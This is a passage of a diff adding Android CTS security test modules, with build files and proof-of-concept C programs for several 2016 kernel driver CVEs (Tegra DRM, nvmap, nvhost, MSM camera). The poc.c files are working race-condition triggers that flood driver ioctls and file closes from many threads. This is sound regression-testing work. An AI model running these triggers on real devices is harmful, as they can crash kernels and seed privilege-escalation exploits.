+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_STOP_KEEPON DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_STOP_KEEPON, struct drm_tegra_keepon)
+
+int fd;
+pthread_t keepon_thread_id[KEEPON_THREAD_NUM] = { 0 };
+
+volatile struct drm_tegra_open_channel open_c = { 0 };
+volatile struct drm_tegra_close_channel close_c = { 0 };
+volatile struct drm_tegra_keepon keepon_c = { 0 };
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ return ret;
+}
+
+static void prepare()
+{
+ open_c.client = HOST1X_CLASS_VIC;
+}
+
+void* keepon_thread(void* no_use)
+{
+ set_affinity(1);
+
+ while(1){
+ ioctl(fd, DRM_IOCTL_TEGRA_STOP_KEEPON, &keepon_c);
+ }
+}
+
+int main()
+{
+ int i, try_time = TRY_TIMES, ret;
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ /* open dev */
+ fd = open(DEV,O_RDONLY);
+ if(fd == -1){
+ return 0;
+ }
+
+ /* prepare ioctl cmd */
+ prepare();
+
+ /* create keepon thread */
+ for(i = 0; i < KEEPON_THREAD_NUM; i++){
+ ret = pthread_create(keepon_thread_id + i, NULL, keepon_thread, NULL);
+ if(ret){
+ goto out_keepon_thread;
+ }
+ }
+
+ while(try_time){
+ /* open */
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+ if(ret == 0){
+ try_time--;
+ /* set keepon */
+ keepon_c.context = open_c.context;
+ /* set close */
+ close_c.context = open_c.context;
+ usleep(500);
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_CLOSE_CHANNEL, &close_c);
+ }
+ }
+
+out_keepon_thread:
+ /* kill keepon thread */
+ for(i = 0; i < KEEPON_THREAD_NUM; i++){
+ pthread_kill(keepon_thread_id[i], SIGKILL);
+ }
+out_dev:
+ close(fd);
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6736/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-6736/Android.mk
new file mode 100644
index 0000000..fd7fc21
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6736/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-6736
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6736/poc.c b/hostsidetests/security/securityPatch/CVE-2016-6736/poc.c
new file mode 100644
index 0000000..77f4b7a
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6736/poc.c
@@ -0,0 +1,174 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define SUBMIT_THREAD_NUM 900
+#define TRY_TIMES SUBMIT_THREAD_NUM
+#define DEV "/dev/dri/renderD129"
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+#define DRM_TEGRA_SUBMIT 0x08
+
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ volatile __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ volatile __u64 context;
+};
+
+struct drm_tegra_submit {
+ __u64 context;
+ __u32 num_syncpts;
+ __u32 num_cmdbufs;
+ __u32 num_relocs;
+ __u32 num_waitchks;
+ __u32 waitchk_mask;
+ __u32 timeout;
+ __u64 syncpts;
+ __u64 cmdbufs;
+ __u64 relocs;
+ __u64 waitchks;
+ __u32 fence; /* Return value */
+ __u32 reserved0;
+ __u64 fences;
+ __u32 reserved1[2]; /* future expansion */
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_SUBMIT DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_SUBMIT, struct drm_tegra_submit)
+
+int fd;
+pthread_t submit_thread_id[SUBMIT_THREAD_NUM] = { 0 };
+
+volatile struct drm_tegra_open_channel open_c = { 0 };
+volatile struct drm_tegra_close_channel close_c = { 0 };
+volatile struct drm_tegra_submit submit_c = { 0 };
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ return ret;
+}
+
+static void prepare()
+{
+ open_c.client = HOST1X_CLASS_VIC;
+}
+
+void* submit_thread(void* no_use)
+{
+ set_affinity(1);
+
+ while(1){
+ ioctl(fd, DRM_IOCTL_TEGRA_SUBMIT, &submit_c);
+ }
+}
+
+int main()
+{
+ int i, try_time = TRY_TIMES, ret;
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ /* open dev */
+ fd = open(DEV,O_RDONLY);
+ if(fd == -1){
+ return 0;
+ }
+
+ /* prepare ioctl cmd */
+ prepare();
+
+ /* create submit thread */
+ for(i = 0; i < SUBMIT_THREAD_NUM; i++){
+ ret = pthread_create(submit_thread_id + i, NULL, submit_thread, NULL);
+ if(ret){
+ goto out_submit_thread;
+ }
+ }
+
+ while(try_time){
+ /* open */
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+ if(ret == 0){
+ try_time--;
+ /* set submit */
+ submit_c.context = open_c.context;
+ /* set close */
+ close_c.context = open_c.context;
+ usleep(500);
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_CLOSE_CHANNEL, &close_c);
+ }
+ }
+
+out_submit_thread:
+ /* kill submit thread */
+ for(i = 0; i < SUBMIT_THREAD_NUM; i++){
+ pthread_kill(submit_thread_id[i], SIGKILL);
+ }
+out_dev:
+ close(fd);
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8412/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8412/Android.mk
new file mode 100644
index 0000000..bba13f3
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8412/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8412
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8412/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8412/poc.c
new file mode 100644
index 0000000..d438b40
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8412/poc.c
@@ -0,0 +1,69 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#include <unistd.h>
+#include <sys/syscall.h>
+#include <string.h>
+#include <stdint.h>
+#include <pthread.h>
+#include <stdio.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <signal.h>
+
+#define VIDIOC_MSM_ACTUATOR_CFG 0xc0d056c6
+#define MSM_SD_SHUTDOWN 0xc00856dd
+
+int fd;
+
+
+int main() {
+ long i;
+ int pid;
+ pthread_t th[6];
+ int argn[50] = {0};
+
+ fd = open("/dev/v4l-subdev7", 0x0ul );
+
+
+ argn[0] = 7;
+ syscall(__NR_ioctl, fd, VIDIOC_MSM_ACTUATOR_CFG, argn, 0, 0, 0);
+
+ pid = fork();
+ if(!pid){
+ argn[0] = 1;
+ while(1){
+ usleep(10);
+ syscall(__NR_ioctl, fd, VIDIOC_MSM_ACTUATOR_CFG, argn, 0, 0, 0);
+ }
+ }
+ i = 0;
+ while(1){
+ i++;
+ argn[0] = 7;
+ syscall(__NR_ioctl, fd, VIDIOC_MSM_ACTUATOR_CFG, argn, 0, 0, 0);
+
+ usleep(100);
+
+ argn[0] = 0;
+ syscall(__NR_ioctl, fd, MSM_SD_SHUTDOWN, argn, 0, 0, 0);
+
+ }
+
+ close(fd);
+
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8424/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8424/Android.mk
new file mode 100644
index 0000000..5ff169b
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8424/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8424
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8424/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8424/poc.c
new file mode 100644
index 0000000..4460b88
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8424/poc.c
@@ -0,0 +1,138 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+
+#include <stdlib.h>
+#include <errno.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <dirent.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <sys/ioctl.h>
+#include <stdio.h>
+#include <string.h>
+#include <dlfcn.h>
+#include <sys/time.h>
+#include <sys/mman.h>
+#include <sys/syscall.h>
+#include <sys/resource.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <unistd.h>
+#include <sched.h>
+
+
+struct nvmap_handle_param {
+ __u32 handle; /* nvmap handle */
+ __u32 param; /* size/align/base/heap etc. */
+ unsigned long result; /* returns requested info*/
+};
+
+struct nvmap_create_handle {
+ union {
+ __u32 id; /* FromId */
+ __u32 size; /* CreateHandle */
+ __s32 fd; /* DmaBufFd or FromFd */
+ };
+ __u32 handle; /* returns nvmap handle */
+};
+
+#define NVMAP_IOC_MAGIC 'N'
+#define NVMAP_IOC_CREATE _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
+#define NVMAP_IOC_PARAM _IOWR(NVMAP_IOC_MAGIC, 8, struct nvmap_handle_param)
+#define NVMAP_IOC_GET_ID _IOWR(NVMAP_IOC_MAGIC, 13, struct nvmap_create_handle)
+#define NVMAP_IOC_GET_FD _IOWR(NVMAP_IOC_MAGIC, 15, struct nvmap_create_handle)
+#define NVMAP_IOC_FREE _IO(NVMAP_IOC_MAGIC, 4)
+
+int g_fd = -1;
+static pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
+static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
+struct nvmap_create_handle* g_allocation = NULL;
+
+int open_driver() {
+ char* dev_path = "/dev/nvmap";
+ g_fd = open(dev_path, O_RDWR);
+ if (g_fd < 0) {
+ printf("[*] open file(%s) failed, errno=%d\n", dev_path, errno);
+ } else {
+ printf("[*] open file(%s) succ!\n", dev_path);
+ }
+ return g_fd;
+}
+
+void trigger_nvmap_create() {
+ ioctl(g_fd, NVMAP_IOC_CREATE, g_allocation);
+ //printf("[*] NVMAP_IOC_CREATE, fd(%d), last error = %d\n", g_allocation->handle, errno);
+}
+
+void trigger_nvmap_free() {
+ static int data = 1024;
+ ioctl(g_fd, NVMAP_IOC_FREE, data);
+ //printf("[*] NVMAP_IOC_FREE last error = %d\n", errno);
+}
+
+void setup_privi_and_affinity(int privi, unsigned long cpu_mask) {
+ setpriority(PRIO_PROCESS, gettid(), privi);
+ printf("[*] setpriority(%d) errno = %d\n", privi, errno);
+
+ /* bind process to a CPU*/
+ if (sched_setaffinity(gettid(), sizeof(cpu_mask), &cpu_mask) < 0) {
+ printf("[*] sched_setaffinity(%ld) errno = %d\n", cpu_mask, errno);
+ }
+}
+
+void prepare_data() {
+ void* data = calloc(1, 0x1000);
+
+ g_allocation = (struct nvmap_create_handle*)data;
+ g_allocation->size = 1024;
+
+ mprotect(data, 0x1000, PROT_READ);
+ printf("[*] mprotect, error = %d\n", errno);
+}
+static int init = 0;
+void* race_thread(void* arg) {
+ setup_privi_and_affinity(0, 2);
+
+ int i;
+ while (1) {
+ if (init == 0) {
+ pthread_mutex_lock(&mutex);
+ pthread_cond_wait(&cond, &mutex);
+ pthread_mutex_unlock(&mutex);
+ init = 1;
+ }
+ trigger_nvmap_free();
+ }
+}
+
+int main(int argc, char**argv) {
+ setup_privi_and_affinity(0, 1);
+ if (open_driver() < 0) {
+ return -1;
+ }
+ prepare_data();
+ pthread_t tid;
+ pthread_create(&tid, NULL, race_thread, NULL);
+ sleep(1);
+ while (1) {
+ if (init == 0)
+ pthread_cond_signal(&cond);
+ trigger_nvmap_create();
+ }
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8425/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8425/Android.mk
new file mode 100644
index 0000000..e984812
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8425/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8425
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8425/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8425/poc.c
new file mode 100644
index 0000000..498bca4
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8425/poc.c
@@ -0,0 +1,140 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <string.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <sys/mman.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define ERR(fmt, ...) printf(fmt ": %d(%s)\n", ##__VA_ARGS__, errno, strerror(errno))
+#define ARRAY_SIZE(a) (sizeof(a) / sizeof((a)[0]))
+#define CLOSE_THREAD_NUM 100
+#define TRY_TIMES 900
+
+#define DEV "/dev/nvhost-vic"
+
+struct nvhost_channel_open_args {
+ __s32 channel_fd;
+};
+
+#define NVHOST_IOCTL_MAGIC 'H'
+#define NVHOST_IOCTL_CHANNEL_OPEN \
+ _IOR(NVHOST_IOCTL_MAGIC, 112, struct nvhost_channel_open_args)
+
+int fd;
+pthread_t close_thread_id[CLOSE_THREAD_NUM] = { 0 };
+pthread_t toggle_thread_id;
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if(ret == -1){
+ printf("[-] set affinity failed: [%d]-%s\n", errno, strerror(errno));
+ }
+ return ret;
+}
+
+static void prepare()
+{
+ return;
+}
+
+volatile int target_fd;
+volatile int attack;
+void* close_thread(void* no_use)
+{
+ set_affinity(1);
+
+ while(attack){
+ usleep(200);
+ close(target_fd);
+ }
+
+ return NULL;
+}
+
+int main()
+{
+ int i, try_time = TRY_TIMES, ret;
+ struct nvhost_channel_open_args o_args = { 0 };
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ /* open dev */
+ fd = open(DEV,O_RDONLY);
+ if(fd == -1){
+ ERR("[-] open failed");
+ return 0;
+ } else {
+ printf("[+] open OK\n");
+ }
+
+ #if 1
+ ret = ioctl(fd, NVHOST_IOCTL_CHANNEL_OPEN, &o_args);
+ if(ret == -1) {
+ ERR("[-] ioctl failed");
+ goto out_dev;
+ } else {
+ printf("[+] ioctl OK, fd = %d\n", o_args.channel_fd);
+ }
+
+ target_fd = o_args.channel_fd;
+ #endif
+
+ /* create close thread */
+ #if 1
+ attack = 1;
+ for(i = 0; i < CLOSE_THREAD_NUM; i++){
+ ret = pthread_create(close_thread_id + i, NULL, close_thread, NULL);
+ if(ret){
+ goto out_close_thread;
+ }
+ }
+ #endif
+
+ #if 1
+ for(i = 0; i < TRY_TIMES; i++){
+ /* open */
+ ret = ioctl(fd, NVHOST_IOCTL_CHANNEL_OPEN, &o_args);
+ usleep(200);
+ }
+ #endif
+
+out_close_thread:
+ attack = 0;
+ /* kill close thread */
+ for(i = 0; i < CLOSE_THREAD_NUM; i++){
+ if(close_thread_id[i])
+ pthread_join(close_thread_id[i], NULL);
+ }
+out_dev:
+ close(fd);
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8426/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8426/Android.mk
new file mode 100644
index 0000000..a134d9c
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8426/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8426
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8426/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8426/poc.c
new file mode 100644
index 0000000..c423416
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8426/poc.c
@@ -0,0 +1,147 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <string.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <sys/mman.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define ERR(fmt, ...) printf(fmt ": %d(%s)\n", ##__VA_ARGS__, errno, strerror(errno))
+#define ARRAY_SIZE(a) (sizeof(a) / sizeof((a)[0]))
+#define CLOSE_THREAD_NUM 100
+#define TRY_TIMES 900
+
+#define DEV "/dev/nvhost-gpu"
+
+struct nvhost_channel_open_args {
+ __s32 channel_fd;
+};
+
+#define NVHOST_IOCTL_MAGIC 'H'
+#define NVHOST_IOCTL_CHANNEL_OPEN \
+ _IOR(NVHOST_IOCTL_MAGIC, 112, struct nvhost_channel_open_args)
+
+int fd;
+pthread_t close_thread_id[CLOSE_THREAD_NUM] = { 0 };
+pthread_t toggle_thread_id;
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if(ret == -1){
+ printf("[-] set affinity failed: [%d]-%s\n", errno, strerror(errno));
+ }
+ return ret;
+}
+
+static void prepare()
+{
+ return;
+}
+
+volatile int target_fd;
+volatile int attack;
+void* close_thread(void* no_use)
+{
+ set_affinity(1);
+
+ while(attack){
+ usleep(200);
+ close(target_fd);
+ }
+
+ return NULL;
+}
+
+int main()
+{
+ int i, try_time = TRY_TIMES, ret;
+ struct nvhost_channel_open_args o_args = { 0 };
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ /* open dev */
+ fd = open(DEV,O_RDONLY);
+ if(fd == -1){
+ ERR("[-] open failed");
+ return 0;
+ } else {
+ printf("[+] open OK\n");
+ }
+
+ #if 1
